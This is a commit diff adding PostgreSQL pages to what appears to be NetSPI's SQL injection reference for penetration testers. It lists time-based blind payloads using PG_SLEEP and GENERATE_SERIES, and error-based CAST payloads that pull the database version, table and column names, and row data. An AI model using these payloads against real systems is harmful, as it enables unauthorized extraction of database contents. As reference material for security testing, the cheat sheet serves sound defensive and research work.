added postgres injection techniques

NetSPI · Mar 26, 2019 · 706de36 · 706de36
1 parent dc0d9f6
commit 706de36
Show file tree

Hide file tree

Showing 6 changed files with 64 additions and 0 deletions.
diff --git a/injectionTypes/blindBased/PostgreSQL.html b/injectionTypes/blindBased/PostgreSQL.html
@@ -0,0 +1,24 @@
+<h3 id="blind-injection">Blind Injection</h3>
+
+<p class="pageDescription">{{site.data.injectionDescriptions.blindBased}}</p>
+
+<h4 class="subheading">Partial-Blind</h4>
+
+<p>Partial-blind injections can be determined by differing HTTP status codes, response times, content-lengths, and HTML contents in the HTTP response. These markers can indicate true or false statements. The queries below will attempt to exploit the injection by asserting a true or false response upon guessed
+  information. True or false queries can also be identified by returning 1(True) or 0(False) rows. An error can also be used to identify 0(False).</p>
+<table class="table table-striped table-hover">
+  <thead>
+    <tr>
+      <th>Description</th>
+      <th>Query</th>
+    </tr>
+  </thead>
+  <tbody>
+    <tr>
+      <td>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</td>
+    </tr>
+    <tr>
+      <td>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</td>
+    </tr>
+  </tbody>
+</table>
diff --git a/injectionTypes/blindBased/index.html b/injectionTypes/blindBased/index.html
@@ -13,4 +13,7 @@
   - title: SQL Server
     shortName: sqlserver
     fileName: sqlserver.html
+  - title: PostgreSQL
+    shortName: PostgreSQL
+    fileName: PostgreSQL.html	
 ---
diff --git a/injectionTypes/errorBased/PostgreSQL.html b/injectionTypes/errorBased/PostgreSQL.html
@@ -0,0 +1,25 @@
+<h3 id="error-based">Error Based</h3>
+
+<p class="pageDescription">{{site.data.injectionDescriptions.errorBased}}</p>
+
+<table class="table table-striped table-hover">
+  <thead>
+    <tr>
+      <th>Description</th>
+      <th align="left">Query</th>
+    </tr>
+  </thead>
+  <tbody>
+    <tr>
+      <td>Explicit conversion</td>
+      <td>,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)</td>
+	  <td>,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--</td>
+	  <td>,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--</td>
+	  <td>,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)</td>
+    </tr>
+    <tr>
+      <td>Implicit conversion</td>
+      <td>TBD</td>
+    </tr>
+  </tbody>
+</table>
diff --git a/injectionTypes/errorBased/index.html b/injectionTypes/errorBased/index.html
@@ -13,4 +13,7 @@
   - title: SQL Server
     shortName: sqlserver
     fileName: sqlserver.html
+  - title: PostgreSQL	
+    shortName: PostgreSQL	
+    fileName: PostgreSQL.html	
 ---
diff --git a/misc/references/PostgreSQL.html b/misc/references/PostgreSQL.html
@@ -0,0 +1,6 @@
+<h3 id="special-thanks-to">Special thanks to:</h3>
+
+<p>
+	<a target="_blank" rel="noopener" href="https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5">https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5</a> <br/>
+	<a target="_blank" rel="noopener" href="https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9">https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9</a> <br/>  
+</p>
diff --git a/misc/references/index.html b/misc/references/index.html
@@ -13,4 +13,7 @@
   - title: SQL Server
     shortName: sqlserver
     fileName: sqlserver.html
+  - title: PostgreSQL
+    shortName: PostgreSQL
+    fileName: PostgreSQL.html	
 ---